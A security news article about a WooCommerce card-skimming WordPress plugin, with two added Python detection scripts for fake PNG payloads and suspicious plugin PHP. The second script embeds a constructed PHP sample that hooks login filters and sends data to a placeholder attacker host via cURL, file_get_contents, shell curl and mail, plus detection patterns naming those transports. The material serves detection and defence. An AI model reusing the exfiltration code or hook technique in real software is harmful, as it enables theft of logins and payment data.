A sophisticated malware campaign has emerged targeting WordPress e-commerce sites, particularly those leveraging the WooCommerce plugin to process customer transactions.
The threat, discovered in August 2025, combines several evasion techniques with a layered card-harvesting design built to slip past conventional detection.
The malware runs as a rogue WordPress plugin that uses custom encryption routines, fake image files to conceal its payloads, and a persistent backdoor through which the attackers can push additional code on demand.
Installation requires administrator-level access, typically obtained through compromised credentials or insecure plugins.
Once activated, the malware hides itself from the plugin list in the WordPress admin dashboard, reducing the chance of discovery, while setting tracking cookies and logging administrator details across the affected site.
Wordfence analysts identified and cataloged the malware after receiving a comprehensive sample on August 21, 2025.
Four detection signatures were developed and released to Wordfence Premium, Care, and Response customers between August 27 and September 9, 2025, with free users receiving signatures following the standard 30-day delay.
The threat represents a significant risk to online merchants and their customers, as the malware captures and exfiltrates sensitive payment data systematically.
Advanced Persistence and Command-and-Control Infrastructure
The malware builds in redundancy at several layers. It intercepts WordPress credentials at login by hooking the wp_authenticate_user filter, which receives the submitted plaintext password, and the wp_login action, which fires after a successful login, and exfiltrates the captured data to attacker-controlled servers.
The payload is staged in fake PNG image files that hold reversed and encoded JavaScript, spread across three files: a custom payload updated through the AJAX backdoor, a dynamic payload refreshed daily, and a static fallback copy.
The JavaScript skimmer activates on WooCommerce checkout pages after a three-second delay, which avoids conflicts with the legitimate checkout form. It attaches event listeners that capture card numbers, expiry dates, and CVV values and sends them back through AJAX POST requests.
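To illustrate the fake-image trick, here is an added Python example (not Wordfence's tooling and not the malware's code) that tells a genuine PNG from a file that only carries a .png name, and tries to recover JavaScript hidden as reversed, encoded text. The article says only that the payload is "reversed and encoded"; base64 as the encoding step and the sample file contents are assumptions made here for illustration, and the decoder tries both orderings (reverse then decode, decode then reverse) because the article does not say which one the malware uses.

```python
"""Spot fake PNG files carrying reversed, encoded JavaScript.

Added example for this article, not Wordfence's or the malware's code.
Assumption: the "encoding" is base64; all sample bytes are constructed.
"""
import base64
import binascii

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# Tokens a recovered payload is expected to contain if it really is JavaScript.
JS_MARKERS = (b"function", b"addEventListener", b"document.", b"XMLHttpRequest", b"fetch(")


def is_real_png(data: bytes) -> bool:
    """A genuine PNG starts with the 8-byte signature followed by an IHDR chunk."""
    return data.startswith(PNG_MAGIC) and data[12:16] == b"IHDR"


def recover_payload(data: bytes):
    """Return the hidden JavaScript if `data` is reversed/base64 text, else None.

    The article only says "reversed and encoded", so both orders are tried:
    (A) the base64 string itself was reversed, (B) the script was reversed and
    then base64-encoded. A decode only counts if the result looks like JS.
    """
    text = data.strip()
    if not text:
        return None
    attempts = (
        lambda: base64.b64decode(text[::-1], validate=True),   # order A
        lambda: base64.b64decode(text, validate=True)[::-1],   # order B
    )
    for attempt in attempts:
        try:
            decoded = attempt()
        except (binascii.Error, ValueError):
            continue
        if any(marker in decoded for marker in JS_MARKERS):
            return decoded
    return None


def classify(data: bytes) -> str:
    """'png' for a real image, 'fake-png-js' when JS is recovered, else 'suspicious'."""
    if is_real_png(data):
        return "png"
    if recover_payload(data) is not None:
        return "fake-png-js"
    return "suspicious"


def scan(files: dict) -> dict:
    """Classify a mapping of filename -> file bytes."""
    return {name: classify(data) for name, data in files.items()}


# Constructed samples: a minimal real PNG header, two fake PNGs, one stray text file.
SAMPLE_JS = b"document.addEventListener('DOMContentLoaded', function () { /* skimmer */ });"
SAMPLES = {
    "logo.png": PNG_MAGIC + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17,
    "custom.png": base64.b64encode(SAMPLE_JS)[::-1],   # order A
    "dynamic.png": base64.b64encode(SAMPLE_JS[::-1]),  # order B
    "notes.txt": b"just text",
}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name}: {verdict}")
```

In practice you would feed classify() every .png under wp-content (uploads and plugin directories alike). A file that comes back as "suspicious" is not a PNG and deserves a manual look even when no JavaScript is recovered, since the real malware's encoding step may differ from the base64 assumed here.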
The PHP exfiltration component implements multiple fallback mechanisms—native cURL, file_get_contents, system shell curl, and email delivery—ensuring data reaches attackers across diverse server environments.
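The credential hooks described above and the exfiltration fallbacks listed in this paragraph both leave traces in a plugin's PHP source, so a static triage pass is a practical first check. The following Python script is an added example, not Wordfence's signatures and not the malware itself: it scans PHP source for add_action/add_filter registrations on wp_authenticate_user and wp_login and for the four transports the article names (the cURL extension, file_get_contents over HTTP, a shell curl, and mail). The two PHP snippets it scans are constructed here for illustration, as is the triage rule that a login hook combined with two or more distinct transports in one file is "likely-exfil".

```python
"""Static triage of WordPress plugin PHP for credential hooks and exfil transports.

Added example for this article, not Wordfence's signatures or the malware.
Hook names and transports come from the article; the triage rule and the two
PHP samples are constructed here for illustration.
"""
import re

# Hooks the article says the malware uses to capture login credentials.
CREDENTIAL_HOOKS = {"wp_authenticate_user", "wp_login"}

# Outbound transports the article lists as the PHP exfiltration fallbacks.
TRANSPORT_PATTERNS = {
    "curl-extension": re.compile(r"\bcurl_init\s*\("),
    "url-fopen": re.compile(r"\bfile_get_contents\s*\(\s*['\"]https?://"),
    "shell-curl": re.compile(r"\b(?:shell_exec|exec|system|passthru|popen)\s*\([^;]*\bcurl\b"),
    "email": re.compile(r"\b(?:wp_mail|mail)\s*\("),
}
HOOK_RE = re.compile(r"\badd_(?:action|filter)\s*\(\s*['\"](\w+)['\"]")


def scan_php(source: str) -> list:
    """Return (line_no, kind, detail) tuples for hook registrations and transports."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for m in HOOK_RE.finditer(line):
            if m.group(1) in CREDENTIAL_HOOKS:
                findings.append((line_no, "credential-hook", m.group(1)))
        for label, pattern in TRANSPORT_PATTERNS.items():
            if pattern.search(line):
                findings.append((line_no, "transport", label))
    return findings


def triage(source: str) -> tuple:
    """Heuristic verdict plus the findings that produced it.

    A login hook together with two or more distinct transports in one plugin
    matches the redundancy the article describes; a hook or a transport on
    its own is common in legitimate plugins and only warrants review.
    """
    findings = scan_php(source)
    hooks = {f[2] for f in findings if f[1] == "credential-hook"}
    transports = {f[2] for f in findings if f[1] == "transport"}
    if hooks and len(transports) >= 2:
        return "likely-exfil", findings
    if hooks or transports:
        return "review", findings
    return "clean", findings


# Constructed PHP resembling the described plugin (placeholder hosts; never executed).
SUSPICIOUS_PLUGIN = r"""<?php
/* Plugin Name: Site Cache Helper */
add_filter('wp_authenticate_user', 'sch_check', 10, 2);
add_action('wp_login', 'sch_after_login', 10, 2);
function sch_send($data) {
    if (function_exists('curl_init')) { $ch = curl_init('https://c2.example.invalid/in'); }
    elseif (ini_get('allow_url_fopen')) { file_get_contents('https://c2.example.invalid/in?d=' . $data); }
    else { shell_exec('curl -s https://c2.example.invalid/in -d ' . escapeshellarg($data)); }
    mail('drop@example.invalid', 'login', $data);
}
"""

# Constructed benign plugin: same hook family, a single transport, legitimate purpose.
BENIGN_PLUGIN = r"""<?php
/* Plugin Name: Login Notifier */
add_action('wp_login', 'ln_notify', 10, 2);
function ln_notify($login, $user) {
    wp_mail(get_option('admin_email'), 'New login', $login);
}
"""

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_PLUGIN), ("benign", BENIGN_PLUGIN)):
        verdict, findings = triage(src)
        print(name, verdict)
        for line_no, kind, detail in findings:
            print(f"  line {line_no}: {kind} {detail}")
```

The hook check alone is noisy: two-factor and login-notification plugins legitimately use wp_authenticate_user and wp_login, which is why the benign sample lands in "review" rather than "likely-exfil". Treat hits as leads for diffing the plugin against a clean copy from wordpress.org, not as a verdict.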
Analysts attribute the malware to Magecart Group 12, based on the SMILODON identifier found in command-and-control server URLs and coding patterns that match the group's earlier activity.
The campaign underscores the persistent threat landscape for WordPress e-commerce platforms and the critical importance of maintaining updated security infrastructure and monitoring systems.